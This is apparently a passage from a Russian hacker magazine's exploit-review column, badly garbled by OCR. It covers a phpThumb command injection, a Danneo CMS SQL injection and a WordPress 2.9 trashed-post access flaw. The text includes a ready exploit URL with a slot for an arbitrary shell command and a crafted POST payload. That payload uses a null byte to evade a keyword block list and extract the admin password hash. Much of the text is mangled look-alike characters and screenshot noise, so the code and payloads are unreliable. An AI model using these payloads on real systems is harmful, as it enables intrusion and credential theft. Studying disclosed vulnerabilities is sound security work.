$кЫз->БеЬидМеззаде ( ' ІшадеМадіск іаііесі ЫкЬ теззаде 
( ' . кгіт($ІМгези1к) . ' ) ' , ЕІЬЕ , ЬШЕ ) ; 
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ЕХРЮІТ5 

КЕѴІЕѴѴ 



ЕХРЮІТ5 

РЕѴІЕѴѴ 




ЕХРЮІТ5 

КЕѴІЕѴѴ 




Настройки дпоте-зсгеепзаѵег 



Здесь нам наиболее важны следующие части: 

• переменная $гасІ іиэ, которая затем передается в $соттапсШпе, кото- 
рая и является аргументом для упомянутой выше ЗаіюЕхесО; 

• функция для вывода деба г- информации ОеЬидМеззадеі) — имен- 
но с помощью нее мы сможем увидеть результат выполнения нашей 
команды. 

Итак, параметры фильтров для ІтадеМадіск передаются в скрипте 
помощью следующего запроса (пример для «Ыиг"]: 

зіке . сот/ркрТЬитЬ.ркрРОЦг [ ] =Ыиг | 5 



іЛіПіт»-кг*+пав-^г]Г1іміК 
Рііез внжяг 14 
ШнЫучміК* 16Ы [<У 1№0} 

Зіскуйсмаоі I І Г&П 

ОііНіѴ Г-.МІ ІГІ О І I ГЬіГ«у 



АіДІіог І«Т Іоц «гЦгу 

тссяиі (Й7-&1 I Г ШВвгп Лп МсСеш «тссап век» Т сячА дшѳ вс. ' І^ЕѴѴЕ. ирйя 
геэВД гоМ-йА І’і^б^аійА&О^йКіѳ.&іікІвОдтэіІсяпі'сПіро ЦрПвгесіСіі 
щщцч ЗООЭ-1 2-1» ѵѵіьат ілсСлпп -[<4* г*<*чя -еот:- - Црйкгкн'икт? 

пкатп 20СЭ-04- 1 1 ИМівт цЮ(і №Сат *чтссвяі [а} гкйтсспі> ' ігсфкліб-игмпБаѵя-р 
Фссапл 2005- (Н- 10 МВт» Імі №Слоп *ггчсаіч» (а} ли ейи* ' стацнхе ирйа&і * эт 

шемт мм тиенилом,. 

(Пееягаі яогалг^г Мівгт» Лмі МсС&п -^тисаиі {вО гвЛмСсспр * СОРѴИЙ А<И №,ѵ2* «. 
ваейга Ж0& тЦ 2 Вегаѳс* Мкега ^пэейъі ДО Івйи5 іи*> 1 СОРігИОІЯ Агів кя ынти о( 
ПѴС4ПП Ивлггряііоп 

тссшиі арК44Н1МВт».|оп1^Сбпп^етпДО№»ііселі*'^ РвИБдтр 



ПИТ 

* Р.ік.14 Сигасі^у 
в • 3 3-ЭЕ 

В <уу.і 
Ш(лі 
К амта? 

Бй/ 

В о^дче 1 * 
Оаітп-юк 
0ССРТИ5 
□ СОРіТЫС- иѳ 
ЙС^5урЙ5ЮН 
В си4па«.&а 



Ао* 

І5Э5 Ц,тяЦ1т 5 
1306 ІуеаіБ 
1600 10ФСЧШ15 
І4гюл(1і Ь 
1656 10 ШЕНИНЕ 

1Т 4ѵеагс 

374 4 ДО» 

1666 14ШЕНЙ15 
1570 14 шелЯНэ 

г 4да* 

1659 ЮШЕНЯПЗ 



Дебаг-информация выводится на картинке так (различныеуровни 5ѴЫ проекта дпоте-зегеепзаѵег-зѵп 

дебага от 1 до 9, нас интересует последний): 



ЬССр : //зіке . сот/ркрТкшпЪ . ркр?ркрТкитЪБеЪид=9 



Принимая во внимание тот факт, что упомянутые выше параметры 
никоим образом не фильтруются, мы можем приступить к конс- 
труированию запроса на выполнение произвольных команд в 
рЬрТЬитЬ. 



ЕХРЮІТ 



Для эксплуатации бага нам нужен полный путьдо любой кар- 
тинки, хранящейся локально на сервере. Картинку, я думаю, ты найдешь 
и без моей помощи, а полный путь к ней можно узнать из того же деба г 
параметра. Итоговый эксплойт для *піх может выглядеть следующим 
образом: 



ЬССр : // зіСе . сот/рЪрТЬ.шпЪ_1 . 7 . 9/ркрТЬшпЪ . 
р!ір?згс = /]тоте/зіЦе . сош/риЫіс_Ы:т1 /кагСіпка . 



зрд&^ікг [ ] =Ыиг | 5 -диаііку 75 -іпкегіасе Ііпе «/ 
коте/зіке . сош/риЫіс_іікт1 /кагкіпка . зрд" зред : " / 
коше/зіке . сот/риЫіс_ккт1/кагкіпка . зрд" ; [ТВОЯ_КО- 
МАНДА] ; &рЬ.рТЬ.шпЬВеЬид= 9 

Перейдя по этому адресу, ты увидишь сгенеренную картинку с резуль- 
татом выполнения твоей команды. Более подробный разбор полетов, а 
также пример эксплуатации под ѴѴіпбоѵѵз ищи на ЬНр://5піррегги/ѵіеѵѵ/8/ 
рИріИитЬ-1 79-агЬіІгагѵ-соттапб-ехесиІіоп-ехрІоіІ . 



ТАКСЕТ5 



рбрТЬитЬ <= 1 .7.9 



50ШТІ0Ы 



В качестве временного решения проблемы ты можешь 
отключить использование ІтадеМадіск перед ОБ с помощью директивы 
в конфиге рбрТЬитЬ: 



► 040 



ХАКЕР 04 /135/ 10 










ЕХРШІТ 5 

РЕѴІЕѴѴ 



С 



ЕХРЮІТ5 








РЕѴІЕѴѴ 




ЕХРЮІТ5 








РЕѴІЕѴѴ 








) 



' И\ 5 ркег*/ 1 оея І/Ьогое/іЬ^жІ'та п/ЪЪі . егіи/Ь ярЬеге/Іося 1 /ЪоміѣіаМп А Ьі ■ «ііЛмІім^І Ьн та/ я 1Ъмт16/У к оі о85 -2-95 * 4рд ' ' 4о« поі *хІ 5 б іп ^іія 
>ЬріЬитЬ.с 1 а 5 і*рЬр м оп Ііпе 3452 

К $%ЬІ 5 ->сасЬ 4 ^іипа№ аігеасіу «іг ^кірріпд ЗеіСасЬеГіІепапаО іп, ?і!е >кріки*Ь*с 1 а 5 е.рЬр н оп Ііпе 2341 
К зіаіЧіпд ЕхіпаеіЕХІГдеіІпадеЗігеО іп ^іі* к> рЬріКиггіЬ»е1а«ірЬр“ ем Нм 2704 

К 0*і Ттмд «$ і** С " /кіркйП*/1о<п 1/Ь$іПй/ІЬ*я<!Іі*іп/ІЬі; - е4и /к^ркепе/іася 1/^о№ІЬ$а^піп Д Ь б . е^и/ііи^еі/а 1 Ьита/я Ки&Лб-У Коіо85-2-9$ - ІР д “ ■ > Ра і ІЫ 
4І1* ^рШіріЬ-сІяг^ркр" оп Ііпе 2727 

* 9іЬіз->ч«Ра(ЛНои6рчі=6ги* оРіег сЬсскіпд і 1ок<1 Раг ашіе г з іп Рііе "рЬріЬигсЬ*с1яя.ркр" оп Ііпе 1173 

>ЬрІЬирЬ І с 1 а 55 »рЬр* < оп Ііпе 3652 

ЩсІал.рЬр" оп Ііпе 1136 

_ „ СІЙ^.рНр" оп ііпе 1136 

К Сеі ІИЯ 9 ііе С Ах ерке ГО/ІООЯ 1/Ьйюе/ІЬ$йгігчіи/ІЬв . егіи/Ьз ркеп*/1й со ІА онсіЬ гагі тіп/іЬ® • егіи/імяде в/а ІЬ им/а 1Ьит16/рЬ*ІФ85-2-55 . 4рд > ЕЙ КЕО шіі 
Оггог 11 

Нягп іпді деі ітядмііеС/1і ірЬеге/1ося1^от/іЬ іягіічіп/ЪЬ® »ее<и/Ь5рІ н іеге/Іося1Ліоі"кіЬ5я«Іг>іп/ЬЬф»есІч/ігаадеі5/а1Ьита/я1Ьиіѵ>16уУЬеІо85-2-55 ■ лрд> Е 
?аі1е4 іо ореп гіпеаго! N 0 рчсЬ Уііе оп 4ігесіогу іп /ЬЕрЬеге/ІосаІ/Ьога/ІЬ^я^гоіп/іЬзрегіи/ІіЬгагу/иѵипЬпяіІ/ркрІЬипЬ.сІязФіркр оп Ііпе 1252 
" іп Рііс н >ЬріЬчгаЬіСІа$і:*рЬр" оп Ііпе 1253 

К йеі ІгадеЗігеС/ксрЬепе/ІйеаІнАош/іЬдосІміп/ІЬх »е^и/Ь 5 ркепе/ 1 йса 1 /к 0 №ІЬ 5 а{ 4 тіп/ѢЬі*егіи/ітвдес/я ІЬ ига/я ІЬи т16/рко6д85-2-85 ■ 4рд> 4а і Іей іп 
4І1* ''рЬрігЬиі^ЬаСІаг^.рЬр" оп Ііпе 1360 

К ІггпдеПадіск5ѵіісНЙиоі1сіЬ1«<ЬІн^? = 1 іп Рі1« ,, рЬріЬирЬ*о1орр*рКр , ‘ оп Пп* 1136 

* РгасеюесІ Шѵіір«>41ігС 0Э (ЫигІ5 -яияіііу 75 -іпіегіасе Ііпе 

Ѵ/кірЬег е/іося 1 /ЬогоьіЬ 5 яйіпіп/%Ъ і ■ егіи/ігтаде 5 /я ІЬи та/я ІЬи го16/^ЬоЪо35-2-95 • 4рдЧ" 

4ред ;\ ІІ Лѵ$рЬепе/ 1 оса 1 /к 0 гаеіЬ 5 айпіп/іЬ 5 »ейи/ігаіде 5 /а ІЬи та/а 1Ьип16/рЬоІо35-2-35.4рд\ 11 ; 1$ -1а;ій;рш*Я иіЛЬ ІпадеМядіск іп 4і1е 
’ У Ь ріЬ имЬ і с Іа» ■ ркр " оп Ііпе 1675 

К Ретяіпіпд НН&->4 , Ип оРіоп ІмядеНадіск: <аппауШ € I > іп 4і1е "рЬріЬиг^.с1йі*.рЬр'" оп 1іпе 1680 
К ІіладеМддіек5и>ііскЯиаі1аЫе^чиаІі , Ьу.?іпіег ІаееЭ = 1 іп 4іІе ,, рЬріЬ«Р^Ь,о1й«.рЬр ,, оп Нпе 1133 

* ІмядеПадіск с<і 1 Нсі « Ссопосгб -йеп^ііу 150 -Ыип 5 -яияіііу 75 -іпіегіям Ііпе 
\"/Ь*рЬе ге/іоеа 1 /кот іЬяай р>і п /і Ь & . ейн/ ігаадез/я ІЬи та/я ІЬигсІб/р Ьоіо35-2-35 ■ ІрдѴ 

4ред іЧ ІІ /Ь 5 рЬепе/ 1 ода 1 /копеіЬ 5 ай > піп/ІЬ 5 .ей:и/ігѵіде 5 /а ІЬи та/я ІЬинІб/рЬоі о85-2-95. 4рдѴ ; 1* “1а;ій;рщсі; -диаіііу 75 -іпіепіясе Ііпе 
1 /ЬярКеп е/іаеа І/Ьопь/іЬ^я^^і п А Ь & . оііи/Ь ср Ье п */1ося 1 /ЬотьіЬ* а^і п А Ь с . «<<и/ігчіде$/я ІЬи та/а 1 Ьипіб/рі'і оі о35-2-35 . Ір 9 С 0 3 " 4р*д з ‘ н /ітр/рТКирі>5иТі о I 
2>Ш Іп ^ііо "рЬріКи пЬ * с 1а*і ■ рЬр “ оп Нпе 1638 
К ІШауеПйдісИ ѵііЬ те^ряде Сіоіяі 42+ 

^гиип-хр-х 4 іЬзя^тіп іЬ$я«Ііпіп 4056 Над 25 2007 . 

— 2883 



<1ги*г“хг-х 6 іЬ 5 я^тіп іЬзасІгаіп 

<Гпинп-хг-х 3 іЬяасітіп іЬха«Ііпіп 

«Іі^иып-хп-х 2 іЬій4^іп іЬ 5 Я{Іпіп 

І іЬ?а4піп іЬ^асІічіп 

1 іЬййсІліп іЬхосІпіп 

1 іЬ?я4тіг> іЬ$й«<піп 

1 іЬга^міп іЬвдсІгоіп 

1 іЬга^міп іЬ 5 а«Іпіп 163345 Аид 25 

1 іЬйа^піп іЬ$а4піп 64356 Аид 28 

1 іЬіа^міп іЬ^а^піп * 

1 ІЬйа^(»ііп іЬійвІтіп 

-ги»-г--г — 1 іЬіа^тіп ІЬгосІічіп 

1 іЬгл^міп іЬ^я«Ііпіп 



— г — 



--г — 



4096 Арг 21 
4056 Аид 28 
4086 Аид 28 
37 Аид 28 
21842 Аид 28 
26707 Аид 25 
37453 Аид 25 



30864 Аид 28 
28867 Аид 28 
5286 Аид 25 
7026 Аид 25 



2007 сясЬс 
2007 4опіі 
2007 іпАохірЬр 
20 07 рНрТНиі'оЬ - соп4 ід - рКр 
2007 рЬрТЬиіФ.рЬр 
2007 рЬріКипЬ.ЬртрірЬр 
2007 рЬріКи(пЬ.с1я».рЬр 
2007 рЬріКиг^>.4іиепс.рЬр 
2007 ркрікилЬ»4чшеіійп?»рЪр 
2007 рЬріКи^Ь в ді#,рЬр 
2007 рЬріЬнгФ* ісо.рКр 
2007 рЬріКчі^ . ипіЬ яг р ■ рЬр 



иі^353(ьйрсІ>^ ді4=358<Ьир<іЭ дгоир*=383<Ьир<1Э 
/ЬарЬепе/Іо ся 1/Ь орк /і Ьі а^міп/іЬ ^ . е<іи/1 іЬпапу А ЬирЬпа і 1 

іЬ: -дияіііу: ао№нп<( поі 4*ипсІ> іп Оіі* 'УЬріЬѵгрЬ.сій^ір.рЬр" оп Ііпе 1704 

* ІРмдеНадісЬТЬирЬпяііТоЙОО Гаііесі іп 4і1е 'УЬрІЬирЬ.еіа^.рЬр" оп Ііпе 2734 

к $*іЗпі*пІаііопОбрепсГяпіНісНЬНйідЬІ< > хіяпѣіпд щііЬ і п Ріі^ "рКрЪЬирЬ. сІар^.рЬр" оп Ііп* 2633 

К 5еі0гіспІяІ»п0ерспсІапіМі44ЬНеідЬі< » ребііпд № м 0"/ Ь= ,| 0 1 ' іп ?і1е 'УЬріКиРіЬ-сІязі.рЬр" оп Ііпе 2659 

* ЕНІГ іЬиіпЬпяіІ ехірйсбіопі <Уіхе=0; іурез""; 0к0> іп 4І1* "рЬріЬиетЬ-сІяи.рЬр" оп Ііпе 2786 
К зіапііпд 5оипсеІ№ідеТо<іОО іп 4І1* УЬріЬимЬ*с1аіг.рЬр НІ оп Ііпе 3044 

К $іЬІ5->и^еЙаиШоиіриі=іпие а-?іеп еЬеекіпд $ипЙ11оше<{Рапаічеіета іп ^ііе 'УЬріКиіЧ>.е1аі5.рЬр“ оп Ііпе 1173 
К рЬрТЪирЬ^беі^рпягчО гебиппіпд “/1мр^ТЬирЬ4В 40^ к * іп Рііе ‘УЬрІЬиРіЬ к е1о»^рЬр И оп Ііпе 3652 
К 1ічсід«Падіск5и>і^ЬЙиаі1яЬІе<іЬіігпЬпяіи = 1 іп ^ііе "рЬріЬиртЬ.с1а??»рЬр" оп Ііпе 1136 
к ІтядеПадіск5ѵПсЬЯѵяі1яЫе<іпо(Іи1яіс> = 1 іп Сііе 'УЬріКитЬ.с1яр?.рНр м оп Ііпе 1136 

к Сеі Ітяде5іге(/ЬррЬеге/1ося1хЬорк/ІЬря«Ітіп/іЬ5 >е«Іи/Ь5рЬепе/1ося1Л)ОР№ІЬ5Я(1(піп/ЪЬр.е4и/І№ідер/я1Ьита/я1Ьип16/рЬоіо85-2-85 ■ 4рд> РЙІІЕ0 иіі- 
еппог " 

Аагп іпд : деі І№іде^іге(/ЬЕрЬепе/1оеа1/Кота/ІЬЕа<1іпіп/ѢЬ$.есІи/Ь^рЬепе/1ося1/Ьо№ІЬ5я<(тіп/іЬ5 а е{Іи/іпсіде5/а1Ьита/а1Ьиті16/рЬоіо85-2-85 ■ 4рд> ; 
Раііесі іо ореп ^бпеам: N 0 йисЬ 4і1е оп «Ііпееіопу Іп /ЬсрЬепе/1беа1/+іоте/іЬдо4тіп/іЬф»есІи/1іЬрапу/ІЬикЬплі1/рЬріЬипЬ .0185** ркр оп Ііпе 1252 
'* іп 4і1* ■уЬр^китЬ-о^РР^рЬр" оп Ііпе 1258 

К Зеі Ітяде5ііе^/КгрЬепе/1ося1/+»оріе/6Ьіае)рііп/6Ь* , е^и/Ьі рЬсг е/іося 1/Ь о™і-Ьія^піп/4Ьі,е^и/і™ де г/о 1Ьита/я1Ьиг>16/рЬоіо85-2-55 ■ 4рд> ^яі1е4 іп 
Рііе 'УЬріЬир^Ь»с1я5Р•рЬр ,, оп Ііпе 1360 

■ ■ ■ " " “ “ ‘ “ Ііпе 1630 



* Йетаіпіпд $іЬІ5->РНп а4ѣеп ІпядеИадіск! <аппяуС0? С $ > іп 4і1е "рЬріЬиріЬ а с1й».ркр ,н оп 1іп< 

К ІпадеИадіек5иііекАѵйі1аЫе<яиа1ііу;Іпіеп1<іее) = 1 іп 4і1е “рЬрікимЬ.еІа^.рЬр" оп Ііпе 1133 

* ІгмдеНадіек саііесі о г (еопѵепі -йіепгііу 150 -дияіііу 75 -іпіепіаее Ііпе 
■'/Ь$рЬ еге/іосо І^Ьогпе/ЬЬ*я(Ісг>іп/%Ь# * е^и/Ь рркеге/Іося І/Ьо**іЬ*я^тіп/ІЬ* • ев(и/іг^іде^/я ІЬита/я ІЬит16>У Ь*Іо85 -2-95 * ірд Е 0 3 “ 
2>$1> іп І’ііе м рЬрікигЬ*о1я».рЬр" оп Ііпе 1655 



4редЕ і, Атр/у7Ьиі»*>4б 48^іГ 



Демонстрация уязвимости в рНрТНитЬ 



$РНРТНШВ_СОКРІС [ 1 рге Еег_ішадетадіск 1 ] = Раізе; 



или просто отключить все опасные функции с помощью директивы РНР 
сПзаЫе^ипсІмопз. 



рИрТІіитЬ() 50икСЕР0КСЕ-ІЧЕТ* 

ТНеРИР МіитЬпаІІ сгеаіог 



Ві ^ирреК ЕГіі г 


1 іІОНГІІЛіИІ 


скзпдеіоч 


ртйіесіраче 


йеліо 


ІІПК& 


оТСь 


|Й?Т пгчу^а 
















ОАМИЕО СМ5 <= 0.5.2 50Ь ІЫ 9ЕСТІ0Ы 
ѴиЬЫЕКАВІЬІТУ 



Е2ІЗ СМ5 Раппео — это опенсорсная система управления сайтом, 
созданная русскими разработчиками и дико популярная на территории 
СНГ. Поддерживает все основные фишки свои старших собратьев: 5Е0 
ітіепсііу ссылки, управление пользователями, статьями, опросами, ком- 
ментариями, загрузка медиа-контента ит.д. 

Нетакдавно ІщЗсШг (самопровозглашенный продолжатель дела 
тіІѵѵОгт.сот сУкраины) нашел вупомянутой СМЗзамечательную фраг- 
ментированную 50 1_- инъекцию. 

Давай проследим вместе с автором причину ее возникновения. 



|)ІцЛІншіНі изег ігш О О ііыаіѵ и> сгезіе Шитйпаііз Тгот ігладез 
УРЕО, РІМѲ. ОІР, ЭМР, ок> оп ІИе Пу ТИе ооіри^ зіге іг сопПдогэЫе 
(с$п ье іагдег ог шаіЕег №ап те зоигсех апо те доигсе ье 
те епііге ітаде ог слЕу а роіііоп оГте огідтаі іпладе Тше соіог 
алеі ге^атрИлд іа иеей іТ ОО ѵ2.й+ іа здаііаые, стеглчае раіеией- 
сліог апа пеагезміеідіііэоиг геаіапд Іа иа&гі. і-талем айі с к Іа оаесі 
ш & геѵег раз&ІЫе (а зреей. Вазіс Іилсіюлаіііу іб аѵаііэйіе еѵеп іГ 
СО іітсйопз ага поі іпзіаііесі (аз Іопд аз ІтадеМадіск із ігізіаИей). 
Опѳ Йетс Тііѳ изез рогііопз о ^эѵэзсгіаі АРІ Ьѵ ^іаглез АозІіп . 

бирромей зоигсе ітаде тгтаіе: 

* ЗРЕОМаСОогітадемедісю 

* Рис (ѵіа 00 оі Ітадемадіск) 

* ОІР іуіа СО, ітадемадіск, огрлртить.діГрИр) 

* ВЫР (ѵіа ітадемадіси ог рРіртитЫшпр.рЬр) 

* агъ'іпюде (сгтзі !ггя$е№адкк саг> іезд 

БирроЛесІ оиіриі ітадѳ Гогтаіз: 

* 0РЕ6 (Из СО ог ітадеІйадісЮ 

* РАС (па СО ог ІтадеМздіск) 

* С№ Сѵіа СО ог ітаде^эдіск) 




(ІЬоом:- ’ ! I Ѵоіе 



I -сьоо м- - 1 1 ѵоіе 



Йаіа а»і еаічпеаі.і№і 

|^сЬив&. т|[~Ѵ^е~] 



Итак, находим следующий код в файле ./тосІ/роІІ/соттепІ.рЬр: 



официальный сайт ркрТЬитЬ 



$сотСехЦ= ( $зеССіпд [ 1 ресИШог 1 ] == "уез " ) ? 
сошшепСрагзе ( $сотСехЦ ) : ОеІСадз (сотшепСрагзе ( $сотСех 
к) ) ; 

$сотпате = (ргерагзе ( $изегтаіп [ ' ІоддеО ' ] ,ТНІ 8 _ШТ) ==1 
&& ргерагзе ( $изегшаіп [ ' изегісі ' ] ,ТНІ 8 _ІЫТ) > 0 ) ? 
$изегшаіп [ ' ипаше ' ] : зиЬзСг (ОеШадз ( $сошпаше) , 0 , 50 ) ; 
$сошСіЦІе = зиЬзСг (ОеІСадз ( $сошСіЦІе) , 0 , 255 ) ; 

$іп = $сіЬ->диегу ( " ІЫ 8 ЕКТ ІЫТО «.$ЬазергеГ. "_ро 11 іпд_ 



сошшепС ѴАШЕ 8 

ІШЬЬ, 1 " . $іс 1 . " 1 , 1 " . $изегтаіп [ 1 изегі 
сі' " . ЫЕѴ 7 ТІМЕ . " ' , 

' $сотпате ' , 1 $сотЦіЦІе ' , ' $сошСехС ' , ' " . 
КЕМОТЕ_АББК 8 

Каквидно, переменная $сотШе урезается до 255 символов, чтоделает 
возможным проведение фрагментированной инъекции (после слеши- 
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ЕХРЮІТ5 

КЕѴІЕѴѴ 







ЕХРЮІТ5 

КЕѴІЕѴѴ 





ЕХРЮІТ5 

КЕѴІЕѴѴ 



Ноте СопІ^гвгЕсез бие$1:$реакег$ Наск> Упох 


Регголаі РНР 


Рта]ей5 Т№С$«е г --'. 


ѴѴоігіРпезб >= 2.9 Раііиге Ьэ Кейгіс± Ассезз 

Ьѵ Іггі&е оп ЕеЬ.13, 2010* илсіег Нзекй, Репопак Ргоіеси 




ѴѴеІсоте Іо Ьтасик 


РоиошігіЁ оп Ггот іНе гезеагсЬ 1 Ьаие Ьееп сопс!ис*еЩ 1 Ьаѵе пош геіеайегі асклйогу 

апО И Ьэе Ьееп Согмуэггіес) опіо іЪе еоггесі реоріе аіг ДОогёРгейй 


ТЬапкз ^ог ^горріп^ Ьу? Гее! ]оіп 0ізсо$$іогі 

Ьу 1еаѵіл§ соптпеп^з, зіау ирОа^есІ Ьу зиЬзсгІЫл^ {о 

ЪЬе К55 Еййсі. 


ШопіРгезй >=■ 23 Раііиге іо КезЫсИ: УЯІ. Йссезз 




Ѵои сап гиЬгсгіЬе Ьу егпэіі Ьу бШіпй іЬе ЙвЫ Ьеіоѵл 






| " | Д.іЪ-'.-іГт 


к и р і / /шіамі 1 . * Ьо т азта с ке ггі е, с о, и к/ 






1, *А0ѵійсгу Іп^огтаЬіопГ 




^ Стасик 1 $ ЫОзег 


Тйіе: ДОог^Ргезз >= 23 Раііиге (:о Резігіс!; ІЖ Дссезз 
Оа*е риЫізЬед: 13/02/2010 




• @0агк0иег ігпЬ йэг ипі, іи э героіЧ іот удзгк 

аЬоуС 42 тіпи^ез а^о ^гат ТшеегОескіп геріу іо 
ОагкО^ег 


2. "ѴиІлегаЬіІку ІлкэггпаІюгГ 

Сіазз: Раііиге ІІЯЬ Ассезз 

Регтю^еіу ЕхрІЫіаЫег Ѵ« 

Іосаііу ЕхрИсйаЫе: Уез 

3. *5й^шаге Оезспр^іоп* 




* ІгеЬзШпа ч/іпхр оп угп зо і сэа 6о готе герогС 

ѵугЙІп^і сіатл ор^н о^ісе апіі з1;дрі^ ^оггга^; 
сНзл^іп^ аЬоиг 1 Ноиг а^о ?гот Т\л/ее(0еск 

* і [23 3 Ьоии а&о ^гот Тш&е^Оеск 

* фігіаиМешЬи^Ьей і 4о й аЬоиЪ 3 Ііте ЬуС 

а^егѵиагсі? И: а ®оос) 5 осп аг Шй бпійЬей 

СЬои^Ь ѵуогк Ьаѵе о^егесі те ай тисЬ йраее[1] 

аЬаиЕ 3 Ьоигй адд ігат ТшееГ:Рескіл геоіѵ 



Уязвимость в ѴѴогсІРгезз 



рования кавычек было «V», стало «\ "») в следующем за ним параметре 
$сотІехІ. Этого уязвимого кода было бы достаточно, если бы не фильтр в 
./Ьазе/сіаппео.іхаск.рбр, который, по идее, должен пресекать все подоз- 
рительные запросы к движку: 

$Ъас1с1аЦа = аггау ( "ШІСЖ" , 

"ОІЛТІЬЕ" , 

"ЕКОМ" , 

"ЗЕЬЕСТ" , 

"ШЕКЕ" , 

"ЗНІЯТОШ" , 

"БРБАТЕ " , 

"БЕЬЕТЕ" , 

" СШШѲЕ " , 

"МОБІЕУ" , 

" ЕЕЫАМЕ " , 

" КЕЬОАБ " , 

"АЦТЕК" , 

" СКАБТ " , 

"БКОР" , 

"ІМЗЕКТ" , 

" ССЖСАТ " , 

" СІПСІ» , 

" ехес " , 



) ; 

Тогеаск ( $_КЕ(21ІЕЗТ аз $рагашз => $іприСсіаСа) { 

ТогеасЬ. ( $Ьасі(іаСа аз $Ъас1кеу => $Ьас1ѵа1ие) { 

ІТ ( із_зкгіпд ( $іприкс1аЦа) && 
егеді ( $Ъас1ѵа1ие , $іприкс1аЦа) ) { $Ъас1соипЦ=1 ; } 

} 

} 

Если ты знаком с подшивкой ][ за последние пару лет, то, наверняка, 
должен знать о том, что функция егед[і] неравнодушно относится к 
нулл-байту, так что дело остается за малым — внедрить его в нужную 
нам для инъекции переменную фсогтКехЕ чтобы обойти данный мер- 



зкий фильтр. В этом нам поможет код из ядра Оаппео, спрятанный в ./ 
Ьазе/сІаппеоУипсЕоп.рЬр: 

ІТ ( ! іпі_деР ( " гедізСег_д1оЬа1з " ) I I (@деС_с^д_ 
ѵаг ( ' гедізСег_д1оЬа1з ' ) ==1 ) ) { 
//@ітрогЦ_гедиезС_ѵагіаЫез ( 'СРС ) ; 

©ехСгасС ( $_СООКІЕ , ЕХТК_ЗКІР) ; 

©ехСгасС ( $_РОЗТ , ЕХТК_ЗКІР) ; 

©ехСгасС ( $_СЕТ , ЕХТК_ЗКІР) ; 

©ехСгасС ( $_КЕ<21ШЗТ, ЕХТК_ЗКІР) ; 

ІТ (деС_шадіс_диоЦез_дрс ( ) ) { 

іТ($_РОЗТ) $_РОЗТ = зСгірзІазЬезаІІ ($_РОЗТ) ; 

ІТ($_СЕТ) $_СЕТ = зргірзіазііезаіі ($_СЕТ) ; 

ІТ ($_КЕ01ІЕЗТ) $_КЕ01ІЕЗТ = зргірзіазііезаіі ($_КЕ()иЕЗТ) ; 
іб ( $_СООКІЕ ) $_СООКІЕ = зСгірзІазЬезаІІ ($_СООКІЕ) ; 

} 

Здесьты можешьувидеть, что при включенной директиве тадіс_цио1:е5 
любые слеши вырезаются функцией зІгірзІазбезаЩ] (это происходит уже 
после глобализации пользовательских переменных, так что $сотбие 
и фсотіехі: все равно уйдут в 5СИ-запросуже со слешами], так что наш 
нулл-байт безболезненно пройдет встроенный фильтр :) 

ШЗЕШдля эксплуатации бага нам необходимо подготовитьтри пере- 
менные: 

1 . $сотпа те — любые буквы и цифры, 5-10 символов; 

2. $сотбие — 254 любых символа плюс кавычка в конце (если же тадіс_ 
диоцез = оІТ, то ставим просто обратный слеш «V] ; 

3. фсотІехіЛІМІЛЕВУТЕ]*/, (ЗЕЕЕСТ абрѵѵб РВОМбп052_абтіпиМІТ 1 ), 1 ] — 
Посылаем специальным образом сформированный Р05Т- па кет к сайту- 
жертве: 

сотпате=1о1о1о&сотЦіШе= [254 символа] ' &соткехЦ=/*\ 
хОО*/, (ЗЕЬЕСТ асіржі ЕКОМ (Іп052_ас3тіп ЫМІТ 1) , 1)-- 
-&іс!= [ІБ опроса] &азах=0&ге=сошшепЦ 

Таким образом, итоговый 50Е-запрос будет выглядеть следующим 
образом: 
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5 




І\І_ѴІІ_ѴѴ 





ЕХРЮІТ5 

КЕѴІЕѴѴ 




ЕХРЮІТ5 

КЕѴІЕѴѴ 



Гад$ 2.9.2 ѴѴр-і Пс Шйе$ циегу.р}1р 


ГІ2409 


ГІ3117 








2281 


2281 


$ъЫ5->розЪ5 = аггау О; 




2282 


2282 


} еі^е 


{ 




2283 




(Іп^аггау ^гъаъиа, аггау сігаіъ 1 , ‘репсііпд 1 ) ) 


У < 


2283 


1 і 


( іп_аг г ау ( $ аггау ( ' сіг а гг. 1 г ’ репсііпд ' , 


-ЬгазК'П > { 


2284 


2234 




// ІІзег тізс. Ьаѵе есііс. регтіззіопз оп ъЬе сіг&іъ %о ргеѵіеет. 


2285 


2285 




(! сиггепс_ие:ег_сап( “ е8іъ_$роаь_ъуре_сар" , 


5сЫ5->розсз [ 0 ] ->ІЬ ) > { 



Заплатка длябагавѴѴогйРгезз 



ШЗЕКТ ШТО сіп052_ро11іпд_сошшепЕ ѴАШЕЗ (ШЬЬ, ' 1 ' , ' 0 ' , 
'1230987393' , ' Іоіоіо ' , ' [2 54 символа] \ ' , ' / * \ 0 * / , (ЗЕЬЕСТ 
асірмсі ЕЕОМ <іп052_ас!тіп ЫМІТ 1) , 1 ) - - - ' , ' 127 .0.0.1') 



В результате ты увидишь хеш пароля админа в своем комментарии. 
Подробности уязвимости ищи по адресу Ь[[р://ѵѵѵѵѵѵ.іп)ЗсШг.сопп/ 
ехріоііз/ 1 1004 . 



ТАРСЕТ5 



Баппео СМ3 <= 0.5.2 



ЗОШТІОЫ 



Для закрытия уязвимости просто обновись до последней 
версии движка, скачать который можно на официальном сайте Оаппео 

СМ5 ШрУ/сІаппео.сопп/сІоѵѵп/ѵіеѵѵ/СМБ.бІппІ . 




ОБХОД ОГРАНИЧЕНИЙ 
БЕЗОПАСНОСТИ ВѴѴ0К0РКЕ55 



Думаю, что нетсмысла рассказыватьтебе отакой популярной 
системеуправления блогами, какѴѴогбРгезз, поэтому сразу перейдем к 
делу. 

Итак, в 2.9 ветке движка появилась новая функциональность — корзи- 
на (іхазЫ для постов. То есть, если ты написал какое-либо сообщение, 
а затем тебе захотелось его удалить, оно не удаляется, а попадает в 
корзину, причем на самом блоге ссылка на такой пост будет видна только 
его автору. 

Уязвимость, найденная Томом Маккензи и Райаном Дьюхестом, заклю- 
чается втом, что удаленный авторизованный пользователь с любыми 
правами может без проблем просматривать та кие сообщения. 

Теперь давай взглянем на код из ./ѵур-іпсІибез/циегу.рЬр, который отве- 
чаетза просмотр постов, не имеющих статус «риЫізб»: 



ІТ ( ('риЫізЬ.' ! = $зСаСиз) ) { 

іб ( ! із_изег_1оддес1_іп ( ) ) { 

// ІІзег шизС Ье Іоддесі іп Со ѵіем иприЫізІіесІ 

розСз . 

$СМз->розСз = аггау ( ) ; 

} еізе { 

іб ( іп_аггау ( $зСаСиз , аггау ( ' сІгаШ ' , 'репсііпд')) 

) { 



Из этого кода ВИДНО, ЧТО: 

1. Неопубликованные посты могут просматривать только авторизован- 
ные юзеры; 

2. Неопубликованными постами считаются только «б га К» и «репсііпд», 
